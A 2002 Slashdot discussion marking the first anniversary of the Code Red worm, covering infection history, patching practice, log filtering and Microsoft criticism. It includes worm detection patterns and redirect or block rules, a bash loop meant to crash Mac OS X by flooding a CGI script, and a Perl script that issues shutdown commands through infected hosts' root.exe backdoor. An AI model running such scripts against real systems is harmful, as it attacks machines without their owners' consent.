
Happy Birthday Code Red
totallygeek writes: "One year ago today (July 19, 2001), more than 359,000 computers were infected with the Code Red worm in less than 14 hours. At the peak of infection, more than 2,000 new machines were infected each minute. Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything had up to then or since. For the first time, systems running the Apache web server were getting requests for a document called "default.ida". Here we are a year later, and my web log shows an average of forty-two requests per day for default.ida over the last five days. To really appreciate the spread of this program, look at this animated image."
IIS is sorta like an STD (Score:4, Funny)
Re:IIS is sorta like an STD (Score:2, Insightful)
Re:IIS is sorta like an STD (Score:4, Insightful)
Yeah, that's fine and dandy for those who don't need the IDA et al. mappings; but what of those people who DO use them?! You know, a lot of those corporate servers that were hacked had those script mappings set for a reason, i.e. they were using them.
That's great that you knew better than to keep the default script mappings, but what about people who needed them?? It would have been a lot nicer if Microsoft had written a secure server in the first place instead. Even the most vigilant sysadmin would still get infected running IIS if he needed to use the IDQ & IDA mappings. In short, don't blame the sysadmin, because it's not always their fault.
Happy Birthday to me.... (Score:3, Funny)
1) DIVX's of Hackers or The Net.
2) Natalie Portman... Enough said.
3) Port me to more platforms.
and finally.... a 2nd chance.
And how fitting... (Score:5, Funny)
Re:And how fitting... (Score:5, Funny)
That is me, and yeah *OUCH*, I am feeling it.
Click Here? (Score:5, Funny)
That's the first time I've seen someone getting smashed by the /. effect, and coming back asking for more!
Re:And how fitting... (Score:2, Interesting)
Re:And how fitting... (Score:2)
Alternate URL for animated image (Score:3, Informative)
I wouldn't worry about it. (Score:5, Funny)
Sorry. (Score:5, Interesting)
Folks will notice though that the fixed version of Code Red I (CodeRed.B) is still going. Picked up a couple of hits today.
Ya think? (Score:4, Interesting)
This was not an exhaustive search, nor a statistically significant sample group, and dynamic IP allocation muddled the results a bit, but it was enough to make me wonder. How many of the 'code red attacks' these days are really script kitties with unix boxes? My guess is they account for most of them.
Has anyone looked into this for more than the 15-20 minutes I put into it?
Re:Ya think? (Score:3, Informative)
The results are:
5 down
14 reported as a Windows variant by nmap
2 unknown
1 Linux
I looked into the 2 unknown results a bit more. Both respond on port 80 with an IIS banner and ASPSESSIONID cookies. One of them has a Serv-U banner for ftp as well.
Interestingly, one of them (the one w/o Serv-U) is a
The Linux result answers on port 443 as a vulnerable version of Apache on someone's firewall in Italy. This is likely being used as a launchpad for attacks.
So, from what I gather, the bulk of the ongoing Code Red attacks are from Windows machines with extremely negligent administrators.
I'm still getting hit as well (Score:2)
servers on the average of every 5min. It would seem
that after all of this time people would clean up their servers. What really bothers me is some of the machines hitting me are commercial web sites versus the home machines.
What about Morris? (Score:5, Insightful)
Granted, the 'Net was a lot smaller, but what about the Morris worm?
Re:What about Morris? (Score:2)
*sob*
Re:What about Morris? (Score:2, Interesting)
All About Morris [software.com.pl]
Wikipedia [wikipedia.com]
It seems that a college kid [discovery.com] wrote a small program to propagate itself to as many computers as it could, and try to run in the background unnoticed. But due to a bug (or bugs) it copied itself many times over and ran multiple times on the same machine, causing it to slow to a point of being unusable.
It infected 6,000 VAX machines in November of 1988.
Gotta love Google [google.com]
Re:What about Morris? (Score:2, Insightful)
The Morris worm was slowed down by the speed of the Internet... we had a 64kbps connection to ICL. We managed to pull our link to the next before we got affected. It was really quite exciting at the time, following the Usenet links as people pulled the Morris worm apart and analysed it byte by byte.
In the end we were probably affected for around 3 days. We first realised there was a problem as Usenet dried up... we used to take all newsgroups with a feed of around 1000 posts per day! This slowed to a trickle during the 'attack'.
Things got back to normal again as you really had to have people who knew what they were doing to get Unix and Vax systems on the 'net back then. Also there were nowhere near as many wankers online, even as a % of the total population. We were there in a spirit of cooperation and discovery. Happy days.
David
Well, at least it was good pizza that night... (Score:5, Interesting)
Seriously, though, it also taught the company I work for a serious lesson about staying on top of this kind of stuff. We had just finished a 2 month project to secure our web servers, but we were still bound by our traditional change management processes - 7 days notification for an outage, and testing of all changes documented and submitted for approval in advance. At the time Code Red hit, I had sent a note saying "we've really got to get this hotfix applied", but we were bound by the process, and we got burned.
Needless to say, when an urgent hotfix comes out now, it takes almost no convincing to get it applied ASAP. If it breaks a web app or two, well, that's the risk we take. We'd rather look for signoff from the business to unapply a hotfix that breaks something, than spend a few days trying to secure the approval beforehand. It's a lot cheaper in the long run to troubleshoot the effects of a hotfix that has unintended side effects than it is to watch your entire web farm get demolished by a worm.
Yes, we run IIS, and I suppose you could harp about how this could all be avoided by running Apache, but the point is that without a policy, strategy, and process for rapidly deploying defenses against net-borne attacks, no system is invulnerable.
Re:Well, at least it was good pizza that night... (Score:2)
Well corporate policy or not it's pretty freakin' irresponsible for not having a security patch that was out more than 25 days before Code Red even hit. (Not to mention anyone who followed Microsoft's best practices for IIS wouldn't have been hit anyway).
Apache, IIS, MSSQL, PHP, BIND, OpenSSH--it doesn't matter... they all gotta be patched.
Re:Well, at least it was good pizza that night... (Score:2, Interesting)
I sometimes use VNC - but restrict it through a firewall so only a specific IP (my work PC) can communicate with it, in specific timeframes. It also does not run as default - I use SSH to start it, also IP filtered and time restricted. Which I think is all possible in Windows as well (have not tried that). Oh - and it does not run as ROOT. I restrict root to console only.
You see the other problem is that XP and 2k may well be running security-vulnerable services without the user knowing - as default setup. Which is why XP is so bad as a Joe User OS - it has more security holes than my socks... Unless you are competent to configure and patch it - and let's face it, even many trained MIS staff miss them - let alone Joe Shmoe Wordprocessor who bought an XP box from PC World.
If a hotfix breaks an app, kick the developer. (Score:4, Interesting)
When your developers are not that educated however, perhaps they use dirty tricks which will break when a hotfix is applied (although I doubt it, hotfixes mostly overwrite existing files without updating CLSIDs etc, because these stay the same) and the app will die after the hotfix is applied: one reason to kick them out the door for some real professionals.
Re:If a hotfix breaks an app, kick the developer. (Score:3, Insightful)
Re:Well, at least it was good pizza that night... (Score:2)
It's not about how frequently exploits and/or fixes arise for the particular services you run - it's all about how quickly and effectively you can deploy defensive measures, and that ultimately comes down to the human element.
Re:Well, at least it was good pizza that night... (Score:2)
It's not about how many people are shooting at you, it's all about how quickly you can duck.
mirrors of code red growth gifs (Score:2, Informative)
Re: mirrors of code red growth gifs (Score:2, Funny)
> http://images.google.com/images?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=CodeRed.gif&btnG=Google+Search
Wow, that .gif is really getting around. Are we sure it isn't a virus, too?
Animation Mirror Sites (Score:5, Informative)
UK Mirror [jump.org.uk]
UK FTP [ucl.ac.uk]
AU Mirror [planetmirror.com]
Flipbook animation (207k)
Quicktime animation of growth by geographic breakdown [caida.org] (200K)
original www.caida.org gif animation [caida.org]
Re:Animation Mirror Sites (Score:2)
Happy Birthday? (Score:4, Insightful)
Maybe we should celebrate the resiliency of the Net. The fact that while attacks on systems continue to come daily, and at a seemingly increasing rate, everything still works most of the time.
--knowledge, not information, is power
Re:Happy Birthday? (Score:5, Funny)
Re:Happy Birthday? (Score:3, Insightful)
Here's some help (Score:2)
<sarcasm> </sarcasm>
Does that help?
IRC quotefile entry (Score:5, Funny)
<skreech> I'm gonna miss code red when its gone, my webpage has never gotten this many hits before
Lots of infected hosts still out there (Score:4, Interesting)
Re:Lots of infected hosts still out there (Score:2)
# echo "`grep cmd\.exe access_log | wc -l` / `wc -l access_log | sed 's/[^0-9]//g'`" | bc -l
All that wasted bandwidth...
Looking at my records (Score:2, Insightful)
Microsoft Security Bulletin MS01-033
June 18, 2001 14:36:53
q300972_w2k_sp3_x86_en.exe
When did Code Red hit? Did I bother to notice? Did I bother to record? No. It didn't affect me much.
Re:Looking at my records (Score:3, Insightful)
A full month.
And, being a competent admin, his boxen weren't hit.
Re:Looking at my records (Score:2, Insightful)
Most boxes affected weren't company systems (Score:2)
Most IIS admins who are responsible for webservers who run company websites did patch IIS long before the worm started or better: did like MS told them to do: disable all extensions not used on the box, like htr and ida. (Oh, and removed the examples)
Ok, some company-used webservers were exploited, but this number is not a majority by far.
Re:Looking at my records (Score:5, Informative)
6/18: MS sends MS01-33: Unchecked Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise - Run code of attacker's choice.
7/18: CodeRed hits, those of us who installed the MS01-33 patch laugh.
7/30: MS et al send out another alert urging people to read MS01-33 and install the patch.
times out (Score:5, Insightful)
Is it slashdotted or is that the demonstration?
;)
My school district's (Score:5, Informative)
I sent them an email - almost a year ago in fact. They just brushed me off and gave a rather pathetic excuse ("the box is too slow to run Norton").
You can read the e-mail here [webhop.net].
Of course, these are the same people who run a trouble ticket server on the district wide WAN that any old joe at school can access and see where the security issues are.
Re:My school district's (Score:3, Informative)
Another rampant problem with IIS that is still VERY VERY widespread is older Servers IIS 4.0 mainly, and some 5.0, that have FrontPage extensions installed, have botched NTFS permissions on the "Front Page Web".
I don't know if anyone has noticed this, but if you have Microsoft Front Page installed on your browser, a little button shows up on your Internet Explorer toolbar. The default is usually the Word icon, as in "edit this page with Microsoft Word", but if you have Front Page installed on your computer, you can select "Edit with FrontPage", and FrontPage will attempt to communicate with the web server for remote authoring. Now if this web server is an IIS server, has Front Page Extensions installed for remote authoring, and the NTFS permissions have not been set correctly, it will give you, the IUSR_ (Internet User) account, FULL Privileges to change the "Front Page web".
As of now, I know 3 high profile companies who have this issue with their sites WIDE OPEN. Anyone can waltz in and alter their website, using the IUSR_ account. I would like to let them but how do I know they are not going to accuse me of something I didn't do, and just happened to stumble on.
Oh well.
Post the URLs (Score:5, Funny)
I'm sending this to local newspapers. (Score:2)
I don't. (Score:2)
I sent it to TV instead: click2houston.com
I bcc'd you on the email.
It's not code red? (Score:2)
Which virus do they have?
I wouldn't worry about the FBI, etc.
It's not like it's a unique infection that no one has ever seen before.
Re:My school district's (Score:2)
Re:My school district's (Score:2)
You'd be amazed [netcraft.com] at the places [netcraft.com] still running old [netcraft.com] apache [netcraft.com] versions despite the ominous [lwn.net] warnings [slashdot.org]!
(Yes, I found the lwn [lwn.net] link very ironic too, but not as funny as this [netcraft.com])
Re:My school district's (Score:2, Informative)
Re:My school district's (Score:2)
I remember microsoft.com had a quote from a guy who was the head IT person over in FBISD on how MS software really made things wonderful for the students and staff members. The guy's name was something Pike. I don't think he works here anymore. If I find the page, I'll post the URL.
The guy's name (in the email) is Doug Wormhoudt. I just removed the e-mail addys as a temporary precaution.
FBISD is a 100% NT shop, though I know they have an AS/400 for student records and someone "in the know" tells me that they have a linux machine sitting on the network.
For the record, I don't have any interest in trying to break into these systems. (Since I know someone will try to accuse me of).
im gonna sing (Score:2, Funny)
Now blow out the flaming servers, and make a wish.
Argh (Score:3, Interesting)
At its peak, Qwest had a 5 hour hold time for people whose Cisco was taken down by the vuln.
Incidentally, the fix killed more routers.
Re:Argh (Score:3, Interesting)
A year later, no service pack 3 for Win2K (Score:2, Insightful)
Corporate America mostly runs Windows 2000. That's the system that needs security and reliability most. And where's Microsoft?
Re:A year later, no service pack 3 for Win2K (Score:2)
I think you better check your Windows Update. I think you'll have 20 or so security fixes to install.
Better luck bashing next time!
Dave
apache attacklog analyser? (Score:2, Interesting)
That'd be cool
go to the source for the image? (Score:2)
http://www.jump.org.uk/caida_code_red_animations/
go there...
Of course, that is a 4.1 MB GIF file.
What pisses me off (Score:4, Informative)
Kind of killed off community effort right there. >;(
Re:What pisses me off (Score:3, Interesting)
The author made the program available on his website, so that anyone not running a webserver could run CRV themselves. I know the author also got a lot of thank you emails from infected users who thought they weren't vulnerable because of misinformation that was going around about the worm.
As to your FBI story, I think the problem there was that the worm-patching-another-worm was making changes to the system without permission of the admin. But it makes me wonder how the FBI may have reacted to the CRV program. Given that the FBI has better educated themselves on computer hacking issues (especially since the witch hunts following the AT&T outage in the early 1990s), my guess is that they saw it as no biggie because it made no permanent changes to the infected machine.
76 Code Red hits in 2 months (Score:2, Insightful)
Total/Unique
Nimda hits: 6213/134
CodeRed hits: 76/76
Damn annoying, though.
Re:76 Code Red hits in 2 months (Score:3, Interesting)
Nimda - 319242 attacks
CodeRed 2 - 15488 attacks
CodeRed - 359 attacks
All from 5777 unique hosts.
Something strangely morbid about this birthday (Score:2)
This... is my bro.
CRAZY EARL the sysadmin lifts a dustcover to reveal a toasted server
This is his party. He's the guest of honor. Today... is his birthday.
Email Mother calls out from down the hall: "Happy Birthday, Code Red."
I will never forget this day. The day I came to IIS city and fought one million Code Red worms. I love the little Commie bastards, I really do. These enemy worms are as persistent as thick-headed CIOs.
These are great days we're living, bros! We are jolly caffeinated giants walking the earth, with Bawlz [thinkgeek.com]. These worms we wasted here today, contain the finest code we will ever see. After we start working with real servers again we're gonna miss not having any worms around worth killing!
(obligatory reference [e-reference.ru] for those who've never seen Full Metal Jacket)
42 (Score:2, Funny)
That is indeed interesting, a short time ago when discussing [daimi.au.dk] Windows security in a Danish newsgroup, I counted the entries in my log. I also had an average of forty-two requests per day.
This couldn't be a coincidence, could it?
Re:42 (Score:2)
Well of course, 42 is the Answer [bbc.co.uk].
The question, alas, is more complex. And will need Slartibartfast's [bbc.co.uk] fjord designing skills. Or Arthur's [bbc.co.uk] brain.
Evil plan (please don't implement) (Score:5, Funny)
One thing we discussed doing was getting a copy, disassembling it, and building a version that would install FreeBSD with Apache with Front Page Extensions and the Active Server Pages module over top of the Windows installation, with all of the web site content left more or less intact.
We figured that it would be pretty cool if we could make it so that people would not notice that their server had been "competitively upgraded" until the next scheduled reboot/update.
We thought that it would be even more likely to go a long time if we captured the console screen of the running server, and used it as the boot "splash screen" for the replacement OS...
Of course, as I said, doing this would be Evil, so we only discussed the possibility.
-- Terry
Haha (Score:3, Funny)
Do I get a cookie?
Mirror (Score:2, Informative)
Here's a mirror of the image.
http://razor.hemmet.chalmers.se/CodeRedSpreading.gif [chalmers.se]
509 (Score:3, Interesting)
You should have seen it last year, one day we were receiving so many requests for non-existent files that our server was crawling, because our not-found page was generated by some scripts. I simply wrote a Perl handler to handle it (roughly 60 secs) and that took care of it.
Quite humorous it was. And that we still get thousands of hits from infected machines is hilarious.
Heh, Internet worms... fun stuff.
The 1% Patch Statistic (Score:4, Informative)
Additionally, the Win2K/NT server guys are afraid to install security patches since they never are really sure how much of their server is going to break [com.com]. Often, admins will patch the servers which touch the Internet but not the internal servers for fear of breaking them. With Code Red, this was quite humorous because the outer servers were patched as soon as the Code Red patch was available, thinking this action would defend the realm against Code Red, but they forgot about the laptop users which brought Code Red in the back door via the local LAN.
But not to worry folks, once we get Palladium hardware in all our servers, this will not happen again right? In fact we won't even have to patch anymore, since everything will be secure and, only secure applications will be allowed to run.
Oh, wait, wouldn't IIS pass the palladium trusted application test?
Why yes it would...... and Code Red would join the list of "Trusted Secure Applications".!
Sorry, I have to smack Palladium every time I get a chance.
Re:Logs Clogged (Score:5, Informative)
One thing to do is have a cron job to scan your logs and if it sees any of the above, add the ip to an iptables blocklist. At least that way, you only get hit once by it from each infected host.
Or you could use apache's rewrite rules to forward all attacks to www.micrsoft.com, but I wouldn't recommend that.
dave
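As an added example (not code from any poster in this thread), here is a Python version of the cron-job idea above: it parses Apache combined-format access_log lines, classifies the probe signatures this thread talks about (the Code Red default.ida request, the root.exe/cmd.exe requests of Code Red II and Nimda, and Nimda's directory probes), reports the share of worm traffic the way the cmd.exe one-liner earlier does, and emits iptables commands only for hosts not already on the blocklist, so each infected host is blocked once. The log lines are constructed, the addresses are documentation-range IPs, and the WORMBLOCK chain name is an assumption.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of Apache combined-format access_log lines. The source
# addresses are documentation-range IPs (RFC 5737), not real hosts.
SAMPLE_LOG = """
192.0.2.10 - - [19/Jul/2002:10:14:03 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 285 "-" "-"
192.0.2.10 - - [19/Jul/2002:10:19:41 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 285 "-" "-"
198.51.100.7 - - [19/Jul/2002:10:20:12 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
198.51.100.7 - - [19/Jul/2002:10:20:13 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"
203.0.113.42 - - [19/Jul/2002:10:21:55 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.42 - - [19/Jul/2002:10:22:01 +0000] "GET /images/logo.gif HTTP/1.1" 200 1432 "http://example.org/" "Mozilla/4.0"
""".strip()

# Minimal parser for the combined log format: client address, timestamp,
# request line and status code are all this scanner needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) '
)

# Probe signatures named in this thread. Ordered so the most specific wins:
# a cmd.exe request under /_vti_bin/ is reported as cmd.exe traffic.
SIGNATURES = (
    ("CodeRed", re.compile(r"^/default\.ida", re.IGNORECASE)),
    ("CodeRedII/Nimda", re.compile(r"/(?:root|cmd)\.exe", re.IGNORECASE)),
    ("Nimda", re.compile(r"^/(?:_vti_bin|_mem_bin|msadc|c|d)/", re.IGNORECASE)),
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return the worm family a request path looks like, or None for ordinary traffic."""
    for name, pattern in SIGNATURES:
        if pattern.search(path):
            return name
    return None


def scan_log(text):
    """Scan log text; return ({ip: set(families)}, total_requests, worm_requests)."""
    hits = defaultdict(set)
    total = worm = 0
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # not a combined-format line; ignore it
        total += 1
        family = classify(rec["path"])
        if family is None:
            continue
        worm += 1
        try:
            ipaddress.ip_address(rec["ip"])  # never feed a malformed token to iptables
        except ValueError:
            continue
        hits[rec["ip"]].add(family)
    return dict(hits), total, worm


def block_commands(hits, already_blocked=frozenset(), chain="WORMBLOCK"):
    """One iptables rule per newly seen host. Hosts already on the blocklist are
    skipped, so a periodic run adds each infected host only once. The chain
    name WORMBLOCK is an assumption for this example, not an iptables default."""
    return [
        f"iptables -A {chain} -s {ip} -p tcp --dport 80 -j DROP"
        for ip in sorted(hits)
        if ip not in already_blocked
    ]


def filter_noise(text):
    """Return only the lines that are not worm probes, to keep a readable log."""
    kept = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or classify(rec["path"]) is None:
            kept.append(line)
    return kept


def worm_share(total, worm):
    """Fraction of all requests that were worm probes."""
    return worm / total if total else 0.0


if __name__ == "__main__":
    hits, total, worm = scan_log(SAMPLE_LOG)
    print(f"{worm}/{total} requests were worm probes ({worm_share(total, worm):.0%})")
    for ip, families in sorted(hits.items()):
        print(f"{ip}: {', '.join(sorted(families))}")
    # Pretend 192.0.2.10 was blocked by an earlier run; only the new host is emitted.
    for cmd in block_commands(hits, already_blocked={"192.0.2.10"}):
        print(cmd)
```

In a cron job you would feed the real access_log to scan_log, keep the set of already-blocked addresses in a state file, and hand the emitted commands to a shell with appropriate privileges; the script itself only produces the rule strings, so it can be dry-run safely.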
Re:Logs Clogged (Score:2)
I doubt the worm is going to bother to follow redirect requests.
Re:Logs Clogged (Score:3, Interesting)
Besides https://microsoft.com/ would chew up more cycles on their end....
All kidding aside, with a redirection rule, the worm may not follow it, but at least it cleans up the logs a little. Plus, Apache's default error page and its default redirect page are about the same size (for the bandwidth conscious).
Just add the following to your httpd.conf at the root level (so they are inherited by all of your <VirtualHost>s as well):
RedirectMatch
RedirectMatch
RedirectMatch
RedirectMatch
For those of you who think these are a bit too general (they match quite a few URLs), or if you have legitimate destinations which are matched by the above patterns, I'm sure they can be modified to suit your needs....
Re:Logs Clogged (Score:3, Informative)
When a legitimate bot such as Google scans your system, it looks in robots.txt to find out where NOT to scan in case you have web pages you do not wish to be searchable.
Re:Logs Clogged (Score:2)
dave
Re:Logs Clogged (Score:2)
Heck, I'd be mildly surprised if Code Red even bothered looking at the response from the server... IIRC, it just dumps the code it wants to run in the HTTP request and lets the code take care of the rest. (On the other hand, nimda does check the status code to see if the server's vulnerable to any of the attacks it tries. If you return 404s, it gives up pretty quickly, but if you return 200, it tries to do a lot more).
Re:Logs Clogged (Score:5, Informative)
SetEnvIf Request_URI "^/default.ida" dontlog
ErrorLog logs/254-error_log
CustomLog logs/254-access_log combined env=!dontlog
check out SetEnvIf in apache docs, you can do even better than this.
Re:Logs Clogged (Score:2, Informative)
redirect /scripts http://www.stoptheviruscold.invalid
redirect /c http://www.stoptheviruscold.invalid
redirect /d http://www.stoptheviruscold.invalid
redirect /_mem_bin http://stoptheviruscold.invalid
redirect /_vti_bin http://stoptheviruscold.invalid
redirect /msadc http://stoptheviruscold.invalid
redirect /MSADC http://www.stoptheviruscold.invalid
RedirectMatch (.*)cmd\.exe$ http://stoptheviruscold.invalid$1
Re:Logs Clogged (Score:2, Informative)
Re:No mac web os9 or older servers EVER exploited (Score:2)
Re:No mac web os9 or older servers EVER exploited (Score:2)
#!/bin/bash
#
# CGI-McPanic: script to crash MacOS X with
# concurrent calls to a CGI-Script
#
# before use, do:
#
# chmod a+x
#
# then call
#
# bash
#
NUMPROC=32
i=0
while [ $i -le $NUMPROC ]
do
i=$[$i + 1]
ab -t 3600 http://localhost/cgi-bin/test-cgi &
done
Re:Interesting... (Score:4, Insightful)
Sounds an awful lot like the fault of the user to me...
Re:Interesting... (Score:3)
Did it occur to you that maybe you should connect the box to the Internet as the LAST STEP? - AFTER the server is configured and PATCHED?
You can get the service pack on another system and write it to CD so you don't need an ethernet connection to make the system current with patches.
Plug the ethernet cable into the server as the dead LAST step.
Re:Interesting... (Score:3, Insightful)
Perhaps that should be obvious to an experienced sysadmin, but most installers of Windows 2000 won't have a clue about such precautions. The intelligent thing for Microsoft to have done is not had IIS turned on by default. This is especially obvious when you consider how many of the Code Red hits you get come from people who obviously don't even use the IIS that's running on their box.
Since Microsoft is aiming their software at clueless users who can't be bothered to secure their machines, Microsoft needs to ensure that their software is secure out of the box.
Re:Interesting... (Score:3, Insightful)
Fifteen years ago we knew that Sun insisted on shipping SunOS with a "+" in
In the real world you have a checklist of things that must be done and things that must be changed before the box can be put into production, especially on the big bad Internet. In our company, where the NT operations MCSE staff are not exactly the brightest thinkers, we have a standard Windows 2000 build document that has a security checklist and says to only install IIS if the box is going to be a web server. There ARE checkboxes in the custom install where you can deselect the install of IIS and other unneeded programs.
If you dare to draw a paycheck you SHOULD be a Professional. It's up to you to learn how a professional operates.
Re:Interesting... (Score:5, Funny)
Microsoft is right. The user is using Microsoft software.
Lamer Exterminator (Score:2)
Xix.
They are user's fault (Score:2)
Viva Unix! =)
Re:Interesting... (Score:4, Informative)
PS. That last point is the crux, and denying webservers the ability to establish outbound HTTP connections would have stopped Code Red type exploits dead. If your network is properly configured, even if you are exploited, then the exploit should have a much harder time propagating and thus making you look like a complete incompetent. The *real* problem is that a *huge* proportion of sysadmins don't seem to understand the most basic of security principles, and that's not Microsoft's problem at all.
Re:All of this kvetching about bad sysadmins, and (Score:3, Insightful)
If you get shot by someone and suffer horrendous injuries, do you sue every bullet proof vest manufacturer, or gun manufacturer because they didn't base their business model around you? Or do you sue (or at least lock up) the one who pointed the gun at you and pull the trigger? Do you go around your neighborhood, testing each doorknob to see if the house is locked, then rob and burn down each house that isn't? Is it the homeowner's fault for not locking the door, or you for entering in the first place?
If you want to hold anyone responsible, try the guy/s who code viruses and worms... Anyone with sufficient pathological incentive to wreak havoc and trash a computer system (or, basically, anything else) will do so...
Responsibility goes two ways, on one hand, those who have known for a substantial period of time that there was a problem that needed addressing, and those who take advantage of that problem... The net makes this all more obvious, at least to those of us with a smidgen of common sense...
Re:All of this kvetching about bad sysadmins, and (Score:2)
Re:All of this kvetching about bad sysadmins, and (Score:2)
Believe it or not, a lot of people are trying just that, and frighteningly having a fair amount of success.
The problem in the case of Code Red, and the worm of the week wreaking havoc with Microsoft products, is one of false representation, and perhaps outright fraud.
People keep getting told from Microsoft "Our servers are stable and secure, you don't need to worry." Then something happens, and Microsoft does nothing until someone has demonstrated in an amazingly public way that their stuff is indeed vulnerable.
Once that happens they issue a fix. The fix usually seems to be some method of messing up the specific method used, so minor changes to the worm make it work again.
The Open Source world on the other hand is very quick to fix any bugs they know about and that can be fixed. More than once some of the security groups were frustrated when Red Hat or some other Linux distro maker, after being informed of a problem, released not only the details but a fix long before they were ready.
Microsoft has actively tried to keep anyone from finding out through any legal means about any security problems with their products. The Linux community works hard to find and fix problems.
Microsoft products are a little like the Ford Pinto of the software world. The Pinto would blow up rather spectacularly if rear ended. Ford was sued and had to fix the problem.
Had Ford voluntarily recalled the Pinto earlier (and the evidence suggested that they knew of the problem before the first Pinto was ever sold), there would have been no cause to sue them. However they tried to cover up the problem, and repeatedly denied the existence of any problem.
Microsoft knows there are vast security holes in their products. They prefer to put them out and hope no one notices. When someone does notice, they deny there is a problem, and have pushed to get anyone who tries to find such problems arrested. They are, in effect, engaged in a cover up. This is what opens them up to being sued. There is rarely a good faith effort to fix any security hole before it becomes a problem.
Contrast that with the Linux world. There are occasionally penetrations, but there is always an effort to find and fix such problems long before such things happen.
The other problem was that IIS and WPS are often installed and running without the person even knowing it. In fairness, most linux distros seem to install and set up Apache without permission too, but at least Apache has been pretty much immune to worms for the last few years. Should you hold everyone who installed win2k on a networked machine responsible because they failed to install security patches on a server they didn't even know they were running?
Microsoft acts very irresponsibly with their software, and there should be some accountability. I wouldn't sue them just over Code Red, but take the worm of the week hitting IIS, and the worm of the week hitting Outhouse, and Microsoft's complete indifference to fixing either, and we get a pattern of indifference which is prosecutable.
Re:Power of slick advertising (Score:3, Insightful)
If you think you can put ANY server up on a public network and not maintain it--you WILL be in for a rude awakening one day.
Re:Power of slick advertising (Score:4, Insightful)
Of course - that's not to say it can't happen to Linux in the future. Some changes that would have to take place would include:
1) An increase in un-administered machines (which is possible as more Linux machines go into service and are promptly forgotten about or appropriate support stuff isn't also put in place).
2) More distributions installing services by default without user knowledge (which most distros seem fairly resistant to doing - but not all).
3) Patches that become as devastating as the security threat they attempt to mitigate (I've yet to see this and would think that any organization that constantly produced dangerous patches / replacement packages would find their user base fleeing to another distribution).
Re:Power of slick advertising (Score:2)
Just a side note, if anyone ever came up with a virus that was as devastating to apache as code red was to IIS, I think Linux would be doomed.
What about the Apache vulnerability that was discovered a couple of weeks ago? I would think there are still loads of people who haven't patched their servers (and even the patch does not give full protection. See the advisory [apache.org]).
Microsoft are addressing the issue of applying patches to products such as IIS with features that remind system administrators about new patches and automate the process of applying them.
I really think that open source systems such as Apache will need to have features like these if they are to compete strongly.
If Code Red taught us one thing, it was that the application of patches is as important as the patches themselves (MS released a patch that prevented Code Red infection months before the outbreak).
Re:To Celebrate the party... (Score:2)
Re:I still have my fake default.ida (Score:2, Informative)
those items out, run it as a CGI script. Any
comments / suggestions? WARNING: I'm still learning perl... this could be (is?) ugly!
#!/usr/bin/perl
# This is a CGI script. Properly linked from your
# web server, it turns around and issues commands
# to a code red-infected server that is trying
# to kill your server. Make $YOURSERVER/default.ida run
# this CGI script, and watch the other server stop its
# IIS service and shut down windows.
use LWP::Simple;
my $incoming;
my $request;
print "HTTP/1.0 200 OK\n\nBeginning rooting of your code-red-infested box...\n";
print "This could look weird on your logs if you're not infected and just poking around.\n\n";
$request = sprintf("http://%s/scripts/root.exe?/c+iisreset+/
$incoming = get $request;
print "\n", $request, "\n\n", $incoming, "\n\n";
$request = sprintf("http://%s/scripts/root.exe?/c+rundll32.e
$incoming = get $request;
print "\n", $request, "\n\n", $incoming, "\n\n";
#Obligatory
print "YHBT. Have a nice day.\n\n";
Re:I still have my fake default.ida (Score:4, Insightful)
That stands for "You have been trolled".
The perl script is a troll, it won't work, I can't believe this got modded up.